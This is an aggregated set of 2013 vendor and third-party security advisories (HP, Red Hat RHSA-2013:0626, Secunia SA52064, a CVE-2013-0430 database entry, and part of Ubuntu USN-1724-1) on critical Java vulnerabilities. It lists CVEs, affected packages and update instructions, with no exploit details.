MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-ibm security update
Advisory ID: RHSA-2013:0626-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0626.html
Issue date: 2013-03-11
CVE Names: CVE-2012-1541 CVE-2012-3174 CVE-2012-3213
CVE-2012-3342 CVE-2013-0351 CVE-2013-0409
CVE-2013-0419 CVE-2013-0422 CVE-2013-0423
CVE-2013-0424 CVE-2013-0425 CVE-2013-0426
CVE-2013-0427 CVE-2013-0428 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0449 CVE-2013-0450
CVE-2013-0809 CVE-2013-1473 CVE-2013-1476
CVE-2013-1478 CVE-2013-1480 CVE-2013-1484
CVE-2013-1485 CVE-2013-1486 CVE-2013-1487
CVE-2013-1493
=====================================================================
1. Summary:
Updated java-1.7.0-ibm packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Detailed
vulnerability descriptions are linked from the IBM Security alerts page,
listed in the References section. (CVE-2012-1541, CVE-2012-3174,
CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419,
CVE-2013-0422, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0431, CVE-2013-0432, CVE-2013-0433,
CVE-2013-0434, CVE-2013-0435, CVE-2013-0437, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0444, CVE-2013-0445,
CVE-2013-0446, CVE-2013-0449, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473,
CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485,
CVE-2013-1486, CVE-2013-1487, CVE-2013-1493)
All users of java-1.7.0-ibm are advised to upgrade to these updated
packages, containing the IBM Java SE 7 SR4 release. All running instances
of IBM Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
894172 - CVE-2013-0422 OpenJDK: MethodHandles.Lookup incorrect permission checks, Java 7 0day (Libraries, 8006017)
894934 - CVE-2012-3174 OpenJDK: MethodHandles incorrect permission checks (Libraries, 8004933)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446)
913021 - CVE-2013-1484 OpenJDK: MethodHandleProxies insufficient privilege checks (Libraries, 8004937)
913025 - CVE-2013-1485 OpenJDK: MethodHandles insufficient privilege checks (Libraries, 8006439)
913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment)
917550 - CVE-2013-0809 OpenJDK: Specially crafted sample model integer overflow (2D, 8007014)
917553 - CVE-2013-1493 OpenJDK: CMM malformed raster memory corruption (2D, 8007675)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
ppc:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.ppc.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.s390.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.i386.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
ppc64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.4.0-1jpp.2.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3174.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0422.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-0809.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1484.html
https://www.redhat.com/security/data/cve/CVE-2013-1485.html
https://www.redhat.com/security/data/cve/CVE-2013-1486.html
https://www.redhat.com/security/data/cve/CVE-2013-1487.html
https://www.redhat.com/security/data/cve/CVE-2013-1493.html
https://access.redhat.com/security/updates/classification/#critical
https://www.ibm.com/developerworks/java/jdk/alerts/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRPja8XlSAg2UNWIIRAheUAJ0YfD3Wq1TJTNvd9g6aoCaIIOMstgCfRXuh
Y+iAc4f3P9/We3tINcGRMdo=
=Yacn
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Download and install the updates from The HP Software Support Online (SSO). ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0232 | CVE-2013-0430 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the installation process of the client. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. (DoS) An attack may be carried out. Oracle Java SE is prone to a remote security vulnerability in Java Runtime Environment.
This issue affects the 'Install' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. ============================================================================
Ubuntu Security Notice USN-1724-1
February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK.
Software Description:
- openjdk-7: Open Source Java implementation
- openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. An attacker could exploit these
to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,
CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information
disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE.
(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,
CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0449)
